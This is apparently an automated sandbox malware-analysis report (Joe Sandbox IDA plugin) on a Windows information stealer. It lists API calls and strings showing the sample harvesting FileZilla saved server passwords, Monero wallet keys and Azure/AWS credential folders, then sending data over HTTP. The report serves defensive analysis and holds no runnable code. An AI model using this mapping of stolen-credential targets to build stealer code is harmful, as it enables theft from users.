                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      Function 00EF0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EF8E0B
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE99EC
                        • Part of subcall function 00EE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9A11
                        • Part of subcall function 00EE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9A31
                        • Part of subcall function 00EE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EE148F,00000000), ref: 00EE9A5A
                        • Part of subcall function 00EE99C0: LocalFree.KERNEL32(00EE148F), ref: 00EE9A90
                        • Part of subcall function 00EE99C0: CloseHandle.KERNEL32(000000FF), ref: 00EE9A9A
                        • Part of subcall function 00EF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF8E52
                      • GetProcessHeap.KERNEL32(00000000,000F423F,00F00DBA,00F00DB7,00F00DB6,00F00DB3), ref: 00EF0362
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF0369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00EF0385
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF0393
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 00EF03CF
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF03DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00EF0419
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF0427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00EF0463
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF0475
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF0502
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF051A
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF0532
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF054A
                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00EF0562
                      • lstrcat.KERNEL32(?,profile: null), ref: 00EF0571
                      • lstrcat.KERNEL32(?,url: ), ref: 00EF0580
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF0593
                      • lstrcat.KERNEL32(?,00F01678), ref: 00EF05A2
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF05B5
                      • lstrcat.KERNEL32(?,00F0167C), ref: 00EF05C4
                      • lstrcat.KERNEL32(?,login: ), ref: 00EF05D3
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF05E6
                      • lstrcat.KERNEL32(?,00F01688), ref: 00EF05F5
                      • lstrcat.KERNEL32(?,password: ), ref: 00EF0604
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF0617
                      • lstrcat.KERNEL32(?,00F01698), ref: 00EF0626
                      • lstrcat.KERNEL32(?,00F0169C), ref: 00EF0635
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF068E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 1942843190-555421843
                      • Opcode ID: 118f8292ffa8f8ed2aca0a894b025c84a15ecde462bd70498bcc3db6f3b19d58
                      • Instruction ID: 54851e02994953441d77c63dcb1c7ce37c099fe971bfdd81c7a15f96184e3840
                      • Opcode Fuzzy Hash: 118f8292ffa8f8ed2aca0a894b025c84a15ecde462bd70498bcc3db6f3b19d58
                      • Instruction Fuzzy Hash: 40D12FB190010CABCB18EFE0DD56EFE77B8AF54300F449428F216BB085DE75AA59DB61
                      Function 00EE5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4839
                        • Part of subcall function 00EE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4849
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE59F8
                      • StrCmpCA.SHLWAPI(?,0168E470), ref: 00EE5A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE5B93
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0168E400,00000000,?,0168CE08,00000000,?,00F01A1C), ref: 00EE5E71
                      • lstrlen.KERNEL32(00000000), ref: 00EE5E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00EE5E93
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EE5E9A
                      • lstrlen.KERNEL32(00000000), ref: 00EE5EAF
                      • lstrlen.KERNEL32(00000000), ref: 00EE5ED8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EE5EF1
                      • lstrlen.KERNEL32(00000000,?,?), ref: 00EE5F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EE5F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00EE5F4C
                      • InternetCloseHandle.WININET(00000000), ref: 00EE5FB0
                      • InternetCloseHandle.WININET(00000000), ref: 00EE5FBD
                      • HttpOpenRequestA.WININET(00000000,0168E4E0,?,0168DA40,00000000,00000000,00400100,00000000), ref: 00EE5BF8
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • InternetCloseHandle.WININET(00000000), ref: 00EE5FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 874700897-2180234286
                      • Opcode ID: a1b4bb63a9095bce79157350dac17397e1d1430da514ed0c91bca7a3a5d570ca
                      • Instruction ID: a53479f7078d49fd8bdbfe97cc867f5871f803413e9c420d176afdd880410e94
                      • Opcode Fuzzy Hash: a1b4bb63a9095bce79157350dac17397e1d1430da514ed0c91bca7a3a5d570ca
                      • Instruction Fuzzy Hash: D0121FB282011CAACB19EBA0DC99FEE73B8BF54700F445179F20A76091DF706A49CF65
                      Function 00EECEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EF8B60: GetSystemTime.KERNEL32(00F00E1A,0168C928,00F005AE,?,?,00EE13F9,?,0000001A,00F00E1A,00000000,?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EF8B86
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EECF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EED0C7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EED0CE
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED208
                      • lstrcat.KERNEL32(?,00F01478), ref: 00EED217
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED22A
                      • lstrcat.KERNEL32(?,00F0147C), ref: 00EED239
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED24C
                      • lstrcat.KERNEL32(?,00F01480), ref: 00EED25B
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED26E
                      • lstrcat.KERNEL32(?,00F01484), ref: 00EED27D
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED290
                      • lstrcat.KERNEL32(?,00F01488), ref: 00EED29F
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED2B2
                      • lstrcat.KERNEL32(?,00F0148C), ref: 00EED2C1
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED2D4
                      • lstrcat.KERNEL32(?,00F01490), ref: 00EED2E3
                        • Part of subcall function 00EFA820: lstrlen.KERNEL32(00EE4F05,?,?,00EE4F05,00F00DDE), ref: 00EFA82B
                        • Part of subcall function 00EFA820: lstrcpy.KERNEL32(00F00DDE,00000000), ref: 00EFA885
                      • lstrlen.KERNEL32(?), ref: 00EED32A
                      • lstrlen.KERNEL32(?), ref: 00EED339
                        • Part of subcall function 00EFAA70: StrCmpCA.SHLWAPI(016889E8,00EEA7A7,?,00EEA7A7,016889E8), ref: 00EFAA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 00EED3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                      • String ID:
                      • API String ID: 1956182324-0
                      • Opcode ID: dfde74688a4bbeff4383e3ed943e80ffce8ab037cf64ec89404bef62deb7fcc3
                      • Instruction ID: 6c6a42aa33d5a396aa7fc28dfdd79c93a8b17a8dc25ded5118621c009ce0271b
                      • Opcode Fuzzy Hash: dfde74688a4bbeff4383e3ed943e80ffce8ab037cf64ec89404bef62deb7fcc3
                      • Instruction Fuzzy Hash: F3E144B1810108ABCB18EFA0DD55EFE73B8BF54301F145078F606B7095DE75AA59CB62
                      Function 00EEC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0168C738,00000000,?,00F0144C,00000000,?,?), ref: 00EECA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00EECA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00EECA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EECAA8
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00EECAD9
                      • StrStrA.SHLWAPI(?,0168C798,00F00B52), ref: 00EECAF7
                      • StrStrA.SHLWAPI(00000000,0168C6D8), ref: 00EECB1E
                      • StrStrA.SHLWAPI(?,0168D500,00000000,?,00F01458,00000000,?,00000000,00000000,?,01688B68,00000000,?,00F01454,00000000,?), ref: 00EECCA2
                      • StrStrA.SHLWAPI(00000000,0168D560), ref: 00EECCB9
                        • Part of subcall function 00EEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00EEC871
                        • Part of subcall function 00EEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EEC87C
                      • StrStrA.SHLWAPI(?,0168D560,00000000,?,00F0145C,00000000,?,00000000,016889C8), ref: 00EECD5A
                      • StrStrA.SHLWAPI(00000000,016888E8), ref: 00EECD71
                        • Part of subcall function 00EEC820: lstrcat.KERNEL32(?,00F00B46), ref: 00EEC943
                        • Part of subcall function 00EEC820: lstrcat.KERNEL32(?,00F00B47), ref: 00EEC957
                        • Part of subcall function 00EEC820: lstrcat.KERNEL32(?,00F00B4E), ref: 00EEC978
                      • lstrlen.KERNEL32(00000000), ref: 00EECE44
                      • CloseHandle.KERNEL32(00000000), ref: 00EECE9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                      • String ID:
                      • API String ID: 3744635739-3916222277
                      • Opcode ID: 7a8ede868600eee862778e03682a5b7470c61edd26432a33d519d3d5e861663a
                      • Instruction ID: 5f027da8d48f2b226d31bc67069dcf9c0714fc69fc6f5d30155e3e4d9f0f6b2d
                      • Opcode Fuzzy Hash: 7a8ede868600eee862778e03682a5b7470c61edd26432a33d519d3d5e861663a
                      • Instruction Fuzzy Hash: 8DE1ECB280014CABDB18EFA0DC95FEE77B8AF54340F045179F20A7B195DE706A4ACB65
                      Function 00EF8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • RegOpenKeyExA.ADVAPI32(00000000,01689E40,00000000,00020019,00000000,00F005B6), ref: 00EF83A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EF8426
                      • wsprintfA.USER32 ref: 00EF8459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EF847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF8499
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $%s\%s$?
                      • API String ID: 3246050789-3278919252
                      • Opcode ID: 081051af444ff4dc93df982202f429ebe61a7da2faaadef809c55a0a4cc084a0
                      • Instruction ID: dcbe1e534cbb92462afadaeecba547be107d966e5f041ebf3108b31d3aff6036
                      • Opcode Fuzzy Hash: 081051af444ff4dc93df982202f429ebe61a7da2faaadef809c55a0a4cc084a0
                      • Instruction Fuzzy Hash: E7810CB191011CABDB28DF54DD95FEAB7B8FF48700F0086A9E209A6180DF716B85CF94
                      Function 00EF4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EF8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF4DB0
                      • lstrcat.KERNEL32(?,\.azure\), ref: 00EF4DCD
                        • Part of subcall function 00EF4910: wsprintfA.USER32 ref: 00EF492C
                        • Part of subcall function 00EF4910: FindFirstFileA.KERNEL32(?,?), ref: 00EF4943
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF4E3C
                      • lstrcat.KERNEL32(?,\.aws\), ref: 00EF4E59
                        • Part of subcall function 00EF4910: StrCmpCA.SHLWAPI(?,00F00FDC), ref: 00EF4971
                        • Part of subcall function 00EF4910: StrCmpCA.SHLWAPI(?,00F00FE0), ref: 00EF4987
                        • Part of subcall function 00EF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00EF4B7D
                        • Part of subcall function 00EF4910: FindClose.KERNEL32(000000FF), ref: 00EF4B92
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF4EC8
                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00EF4EE5
                        • Part of subcall function 00EF4910: wsprintfA.USER32 ref: 00EF49B0
                        • Part of subcall function 00EF4910: StrCmpCA.SHLWAPI(?,00F008D2), ref: 00EF49C5
                        • Part of subcall function 00EF4910: wsprintfA.USER32 ref: 00EF49E2
                        • Part of subcall function 00EF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00EF4A1E
                        • Part of subcall function 00EF4910: lstrcat.KERNEL32(?,0168E460), ref: 00EF4A4A
                        • Part of subcall function 00EF4910: lstrcat.KERNEL32(?,00F00FF8), ref: 00EF4A5C
                        • Part of subcall function 00EF4910: lstrcat.KERNEL32(?,?), ref: 00EF4A70
                        • Part of subcall function 00EF4910: lstrcat.KERNEL32(?,00F00FFC), ref: 00EF4A82
                        • Part of subcall function 00EF4910: lstrcat.KERNEL32(?,?), ref: 00EF4A96
                        • Part of subcall function 00EF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00EF4AAC
                        • Part of subcall function 00EF4910: DeleteFileA.KERNEL32(?), ref: 00EF4B31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
